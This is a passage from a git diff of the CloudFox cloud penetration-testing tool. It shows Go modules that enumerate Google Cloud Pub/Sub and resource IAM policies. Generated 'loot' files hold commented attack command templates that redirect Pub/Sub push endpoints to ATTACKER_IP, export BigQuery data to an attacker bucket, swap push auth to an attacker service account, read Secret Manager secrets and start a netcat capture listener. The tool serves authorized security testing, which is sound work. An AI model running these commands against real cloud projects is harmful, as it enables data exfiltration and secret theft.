gcloud pubsub subscriptions create exfil-sub-%s --topic=%s --project=%s --push-endpoint="https://ATTACKER_IP:8080/capture" + +# All new messages published to this topic will be POSTed to your listener as JSON +# The message body is base64-encoded in the POST payload under .message.data + +`, + topic.Name, topic.ProjectID, + topic.Name, topic.ProjectID, + topic.Name, topic.ProjectID, + topic.Name, topic.ProjectID, + topic.Name, topic.ProjectID, + topic.Name, topic.ProjectID, + topic.Name, topic.ProjectID, + topic.Name, topic.ProjectID, + topic.Name, topic.Name, topic.ProjectID, + topic.Name, topic.Name, topic.ProjectID, + ) +} + +func (m *PubSubModule) addSubscriptionToLoot(projectID string, sub PubSubService.SubscriptionInfo) { + lootFile := m.LootMap[projectID]["pubsub-commands"] + if lootFile == nil { + return + } + + // Check for public access + publicAccess := "" + for _, binding := range sub.IAMBindings { + if shared.IsPublicPrincipal(binding.Member) { + publicAccess = " [PUBLIC ACCESS]" + break + } + } + + lootFile.Contents += fmt.Sprintf( + "# -----------------------------------------------------------------------------\n"+ + "# SUBSCRIPTION: %s%s\n"+ + "# -----------------------------------------------------------------------------\n"+ + "# Project: %s\n"+ + "# Topic: %s\n", + sub.Name, publicAccess, + sub.ProjectID, sub.Topic, + ) + + // Cross-project info + if sub.TopicProject != "" && sub.TopicProject != sub.ProjectID { + lootFile.Contents += fmt.Sprintf("# Cross-Project: Yes (topic in %s)\n", sub.TopicProject) + } + + // Subscription type + subType := "Pull" + if sub.PushEndpoint != "" { + subType = "Push" + } else if sub.BigQueryTable != "" { + subType = "BigQuery Export" + } else if sub.CloudStorageBucket != "" { + subType = "Cloud Storage Export" + } + lootFile.Contents += fmt.Sprintf("# Type: %s\n", subType) + + // Push endpoint info + if sub.PushEndpoint != "" { + lootFile.Contents += fmt.Sprintf( + "# Push Endpoint: %s\n"+ + "# Push Service Account: %s\n", + sub.PushEndpoint, + sub.PushServiceAccount, + ) + } + + // Export destinations + if sub.BigQueryTable != "" { + lootFile.Contents += fmt.Sprintf("# BigQuery Export: %s\n", sub.BigQueryTable) + } + if sub.CloudStorageBucket != "" { + lootFile.Contents += fmt.Sprintf("# GCS Export: %s\n", sub.CloudStorageBucket) + } + + // Dead letter config + if sub.DeadLetterTopic != "" { + lootFile.Contents += fmt.Sprintf( + "# Dead Letter Topic: %s (Max Attempts: %d)\n", + sub.DeadLetterTopic, + sub.MaxDeliveryAttempts, + ) + } + + // Filter + if sub.Filter != "" { + lootFile.Contents += fmt.Sprintf("# Filter: %s\n", sub.Filter) + } + + // IAM bindings + if len(sub.IAMBindings) > 0 { + lootFile.Contents += "# IAM Bindings:\n" + for _, binding := range sub.IAMBindings { + lootFile.Contents += fmt.Sprintf("# %s -> %s\n", binding.Role, binding.Member) + } + } + + lootFile.Contents += fmt.Sprintf(` +# === ENUMERATION COMMANDS === + +# Describe subscription +gcloud pubsub subscriptions describe %s --project=%s + +# Get IAM policy +gcloud pubsub subscriptions get-iam-policy %s --project=%s + +# List snapshots for this subscription +gcloud pubsub snapshots list --project=%s + +# === EXPLOIT COMMANDS === + +# Pull messages WITHOUT acknowledging (peek at messages, they stay in queue) +gcloud pubsub subscriptions pull %s --project=%s --limit=100 + +# Pull and acknowledge messages (removes them from queue - destructive!) +gcloud pubsub subscriptions pull %s --project=%s --limit=100 --auto-ack + +# Pull messages with wait (useful for real-time monitoring) +# gcloud pubsub subscriptions pull %s --project=%s --limit=10 --wait + +# === MESSAGE EXFILTRATION === + +# Continuous message pulling loop (exfiltrate all messages) +# while true; do gcloud pubsub subscriptions pull %s --project=%s --limit=100 --auto-ack --format=json >> exfiltrated_messages.json; sleep 1; done + +# Pull and save to file +# gcloud pubsub subscriptions pull %s --project=%s --limit=1000 --format=json > messages.json + +# === NETCAT / WEBHOOK CAPTURE === + +# Convert this subscription to push mode and redirect messages to your listener (requires pubsub.subscriptions.update) +# Step 1: Start a listener on your attacker host +# nc -lk 4444 +# Or use a Python HTTP server: +# python3 -c "from http.server import HTTPServer, BaseHTTPRequestHandler; import json +# class H(BaseHTTPRequestHandler): +# def do_POST(self): +# data = self.rfile.read(int(self.headers['Content-Length'])) +# print(json.dumps({'headers': dict(self.headers), 'body': data.decode()}, indent=2)) +# self.send_response(200); self.end_headers() +# HTTPServer(('0.0.0.0', 8080), H).serve_forever()" +# Step 2: Set push endpoint on this subscription +# gcloud pubsub subscriptions modify-push-config %s --project=%s --push-endpoint="https://ATTACKER_IP:8080/capture" +# Messages will be POSTed as JSON with base64-encoded data in .message.data + +# === SNAPSHOT & SEEK ATTACKS === + +# Create a snapshot of current subscription state (requires pubsub.snapshots.create) +# gcloud pubsub snapshots create snapshot-%s --subscription=%s --project=%s + +# Seek to beginning of retention period (replay all retained messages) +# gcloud pubsub subscriptions seek %s --time="2024-01-01T00:00:00Z" --project=%s + +# Seek to a snapshot (replay messages from snapshot point) +# gcloud pubsub subscriptions seek %s --snapshot=snapshot-%s --project=%s + +`, + sub.Name, sub.ProjectID, + sub.Name, sub.ProjectID, + sub.ProjectID, + sub.Name, sub.ProjectID, + sub.Name, sub.ProjectID, + sub.Name, sub.ProjectID, + sub.Name, sub.ProjectID, + sub.Name, sub.ProjectID, + sub.Name, sub.ProjectID, + sub.Name, sub.Name, sub.ProjectID, + sub.Name, sub.ProjectID, + sub.Name, sub.Name, sub.ProjectID, + ) + + // Push endpoint specific attacks + if sub.PushEndpoint != "" { + lootFile.Contents += fmt.Sprintf(`# === PUSH ENDPOINT ATTACKS === + +# Current push endpoint: %s +# Push SA: %s + +# Redirect messages to attacker listener (requires pubsub.subscriptions.update) +# Step 1: Start listener: nc -lk 4444 (or python3 HTTP server on port 8080) +# Step 2: Modify push endpoint: +# gcloud pubsub subscriptions modify-push-config %s --project=%s --push-endpoint="https://ATTACKER_IP:8080/capture" + +# Remove push config (convert to pull subscription for easier exfiltration) +# gcloud pubsub subscriptions modify-push-config %s --project=%s --push-endpoint="" + +# Change push authentication (OIDC token attack) +# gcloud pubsub subscriptions modify-push-config %s --project=%s --push-endpoint="%s" --push-auth-service-account="attacker-sa@attacker-project.iam.gserviceaccount.com" + +`, + sub.PushEndpoint, sub.PushServiceAccount, + sub.Name, sub.ProjectID, + sub.Name, sub.ProjectID, + sub.Name, sub.ProjectID, sub.PushEndpoint, + ) + } + + // BigQuery export attacks + if sub.BigQueryTable != "" { + lootFile.Contents += fmt.Sprintf(`# === BIGQUERY EXPORT ATTACKS === + +# Current export table: %s + +# Query exported messages from BigQuery +bq query --use_legacy_sql=false 'SELECT * FROM %s LIMIT 1000' + +# Export BigQuery table to GCS for bulk download +# bq extract --destination_format=NEWLINE_DELIMITED_JSON '%s' gs://attacker-bucket/exported_messages/*.json + +# Show table schema (understand message structure) +bq show --schema %s + +`, + sub.BigQueryTable, + strings.Replace(sub.BigQueryTable, ":", ".", 1), + sub.BigQueryTable, + sub.BigQueryTable, + ) + } + + // GCS export attacks + if sub.CloudStorageBucket != "" { + lootFile.Contents += fmt.Sprintf(`# === CLOUD STORAGE EXPORT ATTACKS === + +# Current export bucket: %s + +# List exported message files +gsutil ls -la gs://%s/ + +# Download all exported messages +gsutil -m cp -r gs://%s/ ./exported_messages/ + +# Stream new exports as they arrive +# gsutil -m rsync -r gs://%s/ ./exported_messages/ + +`, + sub.CloudStorageBucket, + sub.CloudStorageBucket, + sub.CloudStorageBucket, + sub.CloudStorageBucket, + ) + } + + // Dead letter topic attacks + if sub.DeadLetterTopic != "" { + lootFile.Contents += fmt.Sprintf(`# === DEAD LETTER TOPIC ATTACKS === + +# Dead letter topic: %s +# Messages that fail delivery %d times go here + +# Create subscription to dead letter topic to capture failed messages +# gcloud pubsub subscriptions create dlq-eavesdrop --topic=%s --project=%s + +# Dead letters often contain sensitive data from failed processing + +`, + sub.DeadLetterTopic, sub.MaxDeliveryAttempts, + sub.DeadLetterTopic, sub.ProjectID, + ) + } + + // Cross-project attack scenarios + if sub.TopicProject != "" && sub.TopicProject != sub.ProjectID { + lootFile.Contents += fmt.Sprintf(`# === CROSS-PROJECT ATTACK SCENARIOS === + +# This subscription reads from topic in project: %s +# This indicates a trust relationship between projects + +# Check if you have access to the source topic +gcloud pubsub topics describe %s --project=%s + +# If you can publish to the source topic, you can inject messages +# gcloud pubsub topics publish %s --message='injected' --project=%s + +`, + sub.TopicProject, + sub.Topic, sub.TopicProject, + sub.Topic, sub.TopicProject, + ) + } + + lootFile.Contents += "\n" +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *PubSubModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *PubSubModule) getTopicsHeader() []string { + return []string{ + "Project", + "Topic", + "Subscriptions", + "Schema", + "KMS Key", + "Retention", + "Public Publish", + "IAM Binding Role", + "IAM Binding Principal", + } +} + +func (m *PubSubModule) getSubsHeader() []string { + return []string{ + "Project", + "Subscription", + "Topic", + "Topic Project", + "Type", + "Destination", + "Filter", + "Ack Deadline", + "Retention", + "Dead Letter", + "Public Subscribe", + "IAM Binding Role", + "IAM Binding Principal", + } +} + +func (m *PubSubModule) topicsToTableBody(topics []PubSubService.TopicInfo) [][]string { + var body [][]string + for _, topic := range topics { + schema := "-" + if topic.SchemaSettings != "" { + schema = topic.SchemaSettings + } + + kmsKey := "-" + if topic.KmsKeyName != "" { + // Extract just the key name from full path for readability + parts := strings.Split(topic.KmsKeyName, "/") + if len(parts) > 0 { + kmsKey = parts[len(parts)-1] + } else { + kmsKey = topic.KmsKeyName + } + } + + retention := "-" + if topic.MessageRetentionDuration != "" { + retention = topic.MessageRetentionDuration + } + + // Check for public publish access + publicPublish := "No" + for _, binding := range topic.IAMBindings { + if shared.IsPublicPrincipal(binding.Member) { + // Check if role allows publishing + if strings.Contains(binding.Role, "publisher") || + strings.Contains(binding.Role, "admin") || + binding.Role == "roles/pubsub.editor" || + binding.Role == "roles/owner" || + binding.Role == "roles/editor" { + publicPublish = "Yes" + break + } + } + } + + if len(topic.IAMBindings) > 0 { + for _, binding := range topic.IAMBindings { + body = append(body, []string{ + m.GetProjectName(topic.ProjectID), + topic.Name, + fmt.Sprintf("%d", topic.SubscriptionCount), + schema, + kmsKey, + retention, + publicPublish, + binding.Role, + binding.Member, + }) + } + } else { + body = append(body, []string{ + m.GetProjectName(topic.ProjectID), + topic.Name, + fmt.Sprintf("%d", topic.SubscriptionCount), + schema, + kmsKey, + retention, + publicPublish, + "-", + "-", + }) + } + } + return body +} + +func (m *PubSubModule) subsToTableBody(subs []PubSubService.SubscriptionInfo) [][]string { + var body [][]string + for _, sub := range subs { + subType := "Pull" + destination := "-" + if sub.PushEndpoint != "" { + subType = "Push" + destination = sub.PushEndpoint + } else if sub.BigQueryTable != "" { + subType = "BigQuery" + destination = sub.BigQueryTable + } else if sub.CloudStorageBucket != "" { + subType = "GCS" + destination = sub.CloudStorageBucket + } + + topicProject := "-" + if sub.TopicProject != "" && sub.TopicProject != sub.ProjectID { + topicProject = sub.TopicProject + } + + filter := "-" + if sub.Filter != "" { + filter = sub.Filter + } + + ackDeadline := "-" + if sub.AckDeadlineSeconds > 0 { + ackDeadline = fmt.Sprintf("%ds", sub.AckDeadlineSeconds) + } + + retention := "-" + if sub.MessageRetention != "" { + retention = sub.MessageRetention + } + + deadLetter := "-" + if sub.DeadLetterTopic != "" { + deadLetter = sub.DeadLetterTopic + } + + // Check for public subscribe access + publicSubscribe := "No" + for _, binding := range sub.IAMBindings { + if shared.IsPublicPrincipal(binding.Member) { + // Check if role allows subscribing/consuming + if strings.Contains(binding.Role, "subscriber") || + strings.Contains(binding.Role, "admin") || + binding.Role == "roles/pubsub.editor" || + binding.Role == "roles/pubsub.viewer" || + binding.Role == "roles/owner" || + binding.Role == "roles/editor" || + binding.Role == "roles/viewer" { + publicSubscribe = "Yes" + break + } + } + } + + if len(sub.IAMBindings) > 0 { + for _, binding := range sub.IAMBindings { + body = append(body, []string{ + m.GetProjectName(sub.ProjectID), + sub.Name, + sub.Topic, + topicProject, + subType, + destination, + filter, + ackDeadline, + retention, + deadLetter, + publicSubscribe, + binding.Role, + binding.Member, + }) + } + } else { + body = append(body, []string{ + m.GetProjectName(sub.ProjectID), + sub.Name, + sub.Topic, + topicProject, + subType, + destination, + filter, + ackDeadline, + retention, + deadLetter, + publicSubscribe, + "-", + "-", + }) + } + } + return body +} + +func (m *PubSubModule) buildTablesForProject(projectID string) []internal.TableFile { + topics := m.ProjectTopics[projectID] + subs := m.ProjectSubscriptions[projectID] + + topicsBody := m.topicsToTableBody(topics) + subsBody := m.subsToTableBody(subs) + + var tableFiles []internal.TableFile + if len(topicsBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_PUBSUB_MODULE_NAME + "-topics", + Header: m.getTopicsHeader(), + Body: topicsBody, + }) + } + if len(subsBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_PUBSUB_MODULE_NAME + "-subscriptions", + Header: m.getSubsHeader(), + Body: subsBody, + }) + } + return tableFiles +} + +func (m *PubSubModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + projectsWithData := make(map[string]bool) + for projectID := range m.ProjectTopics { + projectsWithData[projectID] = true + } + for projectID := range m.ProjectSubscriptions { + projectsWithData[projectID] = true + } + + for projectID := range projectsWithData { + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = PubSubOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart( + "gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_PUBSUB_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +func (m *PubSubModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allTopics := m.getAllTopics() + allSubs := m.getAllSubscriptions() + + topicsBody := m.topicsToTableBody(allTopics) + subsBody := m.subsToTableBody(allSubs) + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + var tableFiles []internal.TableFile + if len(topicsBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_PUBSUB_MODULE_NAME + "-topics", + Header: m.getTopicsHeader(), + Body: topicsBody, + }) + } + if len(subsBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_PUBSUB_MODULE_NAME + "-subscriptions", + Header: m.getSubsHeader(), + Body: subsBody, + }) + } + + output := PubSubOutput{Table: tableFiles, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_PUBSUB_MODULE_NAME) + m.CommandCounter.Error++ + } +} + + diff --git a/gcp/commands/resourceiam.go b/gcp/commands/resourceiam.go new file mode 100644 index 00000000..fd4c27fd --- /dev/null +++ b/gcp/commands/resourceiam.go @@ -0,0 +1,602 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + resourceiamservice "github.com/BishopFox/cloudfox/gcp/services/resourceIAMService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPResourceIAMCommand = &cobra.Command{ + Use: globals.GCP_RESOURCEIAM_MODULE_NAME, + Aliases: []string{"resiam", "resource-policies"}, + Short: "Enumerate IAM policies on GCP resources (buckets, datasets, secrets, etc.)", + Long: `Enumerate IAM policies attached directly to GCP resources. + +This module discovers WHO has access to WHAT resources by enumerating +resource-level IAM policies (not just project-level policies). + +Supported Resource Types: +- Cloud Storage buckets +- BigQuery datasets +- Pub/Sub topics and subscriptions +- Secret Manager secrets +- Cloud KMS keys +- Cloud Functions +- Cloud Run services + +Key Findings: +- Public access (allUsers/allAuthenticatedUsers) +- Cross-project access patterns +- Overly permissive roles on sensitive resources +- Federated identity access to resources`, + Run: runGCPResourceIAMCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type ResourceIAMModule struct { + gcpinternal.BaseGCPModule + + ProjectBindings map[string][]resourceiamservice.ResourceIAMBinding + LootMap map[string]map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type ResourceIAMOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o ResourceIAMOutput) TableFiles() []internal.TableFile { return o.Table } +func (o ResourceIAMOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPResourceIAMCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_RESOURCEIAM_MODULE_NAME) + if err != nil { + return + } + + module := &ResourceIAMModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectBindings: make(map[string][]resourceiamservice.ResourceIAMBinding), + LootMap: make(map[string]map[string]*internal.LootFile), + } + + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *ResourceIAMModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Enumerating resource-level IAM policies...", globals.GCP_RESOURCEIAM_MODULE_NAME) + + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_RESOURCEIAM_MODULE_NAME, m.processProject) + + allBindings := m.getAllBindings() + if len(allBindings) == 0 { + logger.InfoM("No resource IAM bindings found", globals.GCP_RESOURCEIAM_MODULE_NAME) + return + } + + // Count statistics + publicCount := 0 + resourceTypes := make(map[string]int) + for _, b := range allBindings { + resourceTypes[b.ResourceType]++ + if b.IsPublic { + publicCount++ + } + } + + // Build summary + var typeSummary []string + for rt, count := range resourceTypes { + typeSummary = append(typeSummary, fmt.Sprintf("%d %s(s)", count, rt)) + } + + logger.SuccessM(fmt.Sprintf("Found %d resource IAM binding(s): %s", + len(allBindings), strings.Join(typeSummary, ", ")), globals.GCP_RESOURCEIAM_MODULE_NAME) + + if publicCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d PUBLIC resource binding(s)!", publicCount), globals.GCP_RESOURCEIAM_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *ResourceIAMModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating resource IAM in project: %s", projectID), globals.GCP_RESOURCEIAM_MODULE_NAME) + } + + // Initialize loot for this project + m.mu.Lock() + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + } + m.LootMap[projectID]["resource-iam-commands"] = &internal.LootFile{ + Name: "resource-iam-commands", + Contents: "# Resource IAM Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap[projectID]["public-resources"] = &internal.LootFile{ + Name: "public-resources", + Contents: "# Public Resources\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.mu.Unlock() + + svc := resourceiamservice.New() + bindings, err := svc.GetAllResourceIAM(ctx, projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_RESOURCEIAM_MODULE_NAME, + fmt.Sprintf("Could not enumerate resource IAM in project %s", projectID)) + return + } + + m.mu.Lock() + m.ProjectBindings[projectID] = append(m.ProjectBindings[projectID], bindings...) + + // Generate loot for all resources + for _, b := range bindings { + m.addResourceToLoot(b, projectID) + if b.IsPublic { + m.addPublicResourceToLoot(b, projectID) + } + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d resource IAM binding(s) in project %s", len(bindings), projectID), globals.GCP_RESOURCEIAM_MODULE_NAME) + } +} + +// getAllBindings aggregates all bindings across projects +func (m *ResourceIAMModule) getAllBindings() []resourceiamservice.ResourceIAMBinding { + var allBindings []resourceiamservice.ResourceIAMBinding + for _, bindings := range m.ProjectBindings { + allBindings = append(allBindings, bindings...) + } + return allBindings +} + +// ------------------------------ +// Loot Management +// ------------------------------ +func (m *ResourceIAMModule) addResourceToLoot(b resourceiamservice.ResourceIAMBinding, projectID string) { + lootFile := m.LootMap[projectID]["resource-iam-commands"] + if lootFile == nil { + return + } + + // Generate enumeration and exploit commands based on resource type + switch b.ResourceType { + case "bucket": + lootFile.Contents += fmt.Sprintf( + "# Bucket: %s (Member: %s, Role: %s)\n"+ + "gsutil iam get %s\n"+ + "gsutil ls %s\n"+ + "gsutil ls -L %s\n\n", + b.ResourceName, b.Member, b.Role, + b.ResourceName, b.ResourceName, b.ResourceName, + ) + case "dataset": + lootFile.Contents += fmt.Sprintf( + "# BigQuery Dataset: %s (Member: %s, Role: %s)\n"+ + "bq show --format=prettyjson %s\n"+ + "bq ls %s\n"+ + "bq query --use_legacy_sql=false 'SELECT table_name FROM `%s`.INFORMATION_SCHEMA.TABLES'\n\n", + b.ResourceName, b.Member, b.Role, + b.ResourceName, b.ResourceName, b.ResourceID, + ) + case "topic": + lootFile.Contents += fmt.Sprintf( + "# Pub/Sub Topic: %s (Member: %s, Role: %s)\n"+ + "gcloud pubsub topics describe %s --project=%s\n"+ + "gcloud pubsub topics get-iam-policy %s --project=%s\n"+ + "# Create a subscription to read messages:\n"+ + "gcloud pubsub subscriptions create cloudfox-tap-%s --topic=%s --project=%s\n"+ + "gcloud pubsub subscriptions pull cloudfox-tap-%s --auto-ack --limit=10 --project=%s\n\n", + b.ResourceName, b.Member, b.Role, + b.ResourceID, b.ProjectID, + b.ResourceID, b.ProjectID, + b.ResourceID, b.ResourceID, b.ProjectID, + b.ResourceID, b.ProjectID, + ) + case "subscription": + lootFile.Contents += fmt.Sprintf( + "# Pub/Sub Subscription: %s (Member: %s, Role: %s)\n"+ + "gcloud pubsub subscriptions describe %s --project=%s\n"+ + "gcloud pubsub subscriptions get-iam-policy %s --project=%s\n"+ + "# Pull messages from subscription:\n"+ + "gcloud pubsub subscriptions pull %s --auto-ack --limit=10 --project=%s\n\n", + b.ResourceName, b.Member, b.Role, + b.ResourceID, b.ProjectID, + b.ResourceID, b.ProjectID, + b.ResourceID, b.ProjectID, + ) + case "secret": + lootFile.Contents += fmt.Sprintf( + "# Secret Manager Secret: %s (Member: %s, Role: %s)\n"+ + "gcloud secrets describe %s --project=%s\n"+ + "gcloud secrets versions list %s --project=%s\n"+ + "gcloud secrets versions access latest --secret=%s --project=%s\n\n", + b.ResourceName, b.Member, b.Role, + b.ResourceID, b.ProjectID, + b.ResourceID, b.ProjectID, + b.ResourceID, b.ProjectID, + ) + case "cryptokey": + lootFile.Contents += fmt.Sprintf( + "# KMS CryptoKey: %s (Member: %s, Role: %s)\n"+ + "gcloud kms keys describe %s --format=json\n"+ + "gcloud kms keys get-iam-policy %s\n\n", + b.ResourceName, b.Member, b.Role, + b.ResourceName, b.ResourceName, + ) + case "function": + lootFile.Contents += fmt.Sprintf( + "# Cloud Function: %s (Member: %s, Role: %s)\n"+ + "gcloud functions describe %s --project=%s\n"+ + "gcloud functions get-iam-policy %s --project=%s\n"+ + "# Invoke function (if invoker role):\n"+ + "gcloud functions call %s --project=%s\n\n", + b.ResourceName, b.Member, b.Role, + b.ResourceID, b.ProjectID, + b.ResourceID, b.ProjectID, + b.ResourceID, b.ProjectID, + ) + case "cloudrun": + lootFile.Contents += fmt.Sprintf( + "# Cloud Run Service: %s (Member: %s, Role: %s)\n"+ + "gcloud run services describe %s --project=%s --format=json\n"+ + "gcloud run services get-iam-policy %s --project=%s\n"+ + "# Get service URL and test access:\n"+ + "gcloud run services describe %s --project=%s --format='value(status.url)'\n\n", + b.ResourceName, b.Member, b.Role, + b.ResourceID, b.ProjectID, + b.ResourceID, b.ProjectID, + b.ResourceID, b.ProjectID, + ) + } +} + +func (m *ResourceIAMModule) addPublicResourceToLoot(b resourceiamservice.ResourceIAMBinding, projectID string) { + lootFile := m.LootMap[projectID]["public-resources"] + if lootFile == nil { + return + } + + lootFile.Contents += fmt.Sprintf( + "# %s: %s\n# Member: %s, Role: %s\n", + b.ResourceType, b.ResourceName, b.Member, b.Role, + ) + + // Add exploitation commands based on resource type + switch b.ResourceType { + case "bucket": + lootFile.Contents += fmt.Sprintf( + "gsutil ls %s\ngsutil cat %s/*\n\n", + b.ResourceName, b.ResourceName, + ) + case "function": + lootFile.Contents += fmt.Sprintf( + "# Function may be publicly invokable\ngcloud functions describe %s --project=%s\n\n", + b.ResourceID, b.ProjectID, + ) + case "cloudrun": + lootFile.Contents += fmt.Sprintf( + "# Cloud Run service may be publicly accessible\ngcloud run services describe %s --project=%s\n\n", + b.ResourceID, b.ProjectID, + ) + } +} + +// resourceKey creates a unique key for a resource to group bindings +func resourceKey(b resourceiamservice.ResourceIAMBinding) string { + return fmt.Sprintf("%s|%s|%s", b.ProjectID, b.ResourceType, b.ResourceName) +} + +// shortenRole extracts a readable role name from the full role path +func shortenRole(role string) string { + // roles/storage.objectViewer -> objectViewer + // projects/xxx/roles/customRole -> customRole + if idx := strings.LastIndex(role, "/"); idx != -1 { + return role[idx+1:] + } + return role +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *ResourceIAMModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *ResourceIAMModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + pathBuilder := m.BuildPathBuilder() + + // Build per-project output data + projectLevelData := make(map[string]internal.CloudfoxOutput) + + for projectID, bindings := range m.ProjectBindings { + header := []string{ + "Resource Type", + "Resource ID", + "Resource Name", + "Public", + "Access (memberType:member [role])", + "Condition", + } + + // Group bindings by resource + resourceBindings := make(map[string][]resourceiamservice.ResourceIAMBinding) + resourceOrder := []string{} // Maintain order + for _, b := range bindings { + key := resourceKey(b) + if _, exists := resourceBindings[key]; !exists { + resourceOrder = append(resourceOrder, key) + } + resourceBindings[key] = append(resourceBindings[key], b) + } + + var body [][]string + for _, key := range resourceOrder { + groupBindings := resourceBindings[key] + if len(groupBindings) == 0 { + continue + } + + // Use first binding for resource info + first := groupBindings[0] + + // Check if any binding is public + isPublic := "No" + for _, b := range groupBindings { + if b.IsPublic { + isPublic = "Yes" + break + } + } + + // Build access list: one line per entity "memberType:member [role]" + var accessList []string + var conditionList []string + for _, b := range groupBindings { + // Format: memberType:member [shortRole] + member := b.MemberEmail + if member == "" { + member = b.Member + } + memberType := strings.ToLower(b.MemberType) + role := shortenRole(b.Role) + + entry := fmt.Sprintf("%s:%s [%s]", memberType, member, role) + accessList = append(accessList, entry) + + // Collect condition expressions + if b.HasCondition && b.ConditionExpression != "" { + condEntry := b.ConditionExpression + if b.ConditionTitle != "" { + condEntry = fmt.Sprintf("%s: %s", b.ConditionTitle, b.ConditionExpression) + } + // Avoid duplicates + found := false + for _, existing := range conditionList { + if existing == condEntry { + found = true + break + } + } + if !found { + conditionList = append(conditionList, condEntry) + } + } + } + + condition := "-" + if len(conditionList) > 0 { + condition = strings.Join(conditionList, "\n") + } + + body = append(body, []string{ + first.ResourceType, + first.ResourceID, + first.ResourceName, + isPublic, + strings.Join(accessList, "\n"), + condition, + }) + } + + // Collect loot files for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + tables := []internal.TableFile{ + { + Name: "resource-iam", + Header: header, + Body: body, + }, + } + + projectLevelData[projectID] = ResourceIAMOutput{ + Table: tables, + Loot: lootFiles, + } + } + + outputData := internal.HierarchicalOutputData{ + ProjectLevelData: projectLevelData, + } + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_RESOURCEIAM_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +func (m *ResourceIAMModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allBindings := m.getAllBindings() + + header := []string{ + "Project ID", + "Resource Type", + "Resource ID", + "Resource Name", + "Public", + "Access (memberType:member [role])", + "Condition", + } + + // Group bindings by resource + resourceBindings := make(map[string][]resourceiamservice.ResourceIAMBinding) + resourceOrder := []string{} // Maintain order + for _, b := range allBindings { + key := resourceKey(b) + if _, exists := resourceBindings[key]; !exists { + resourceOrder = 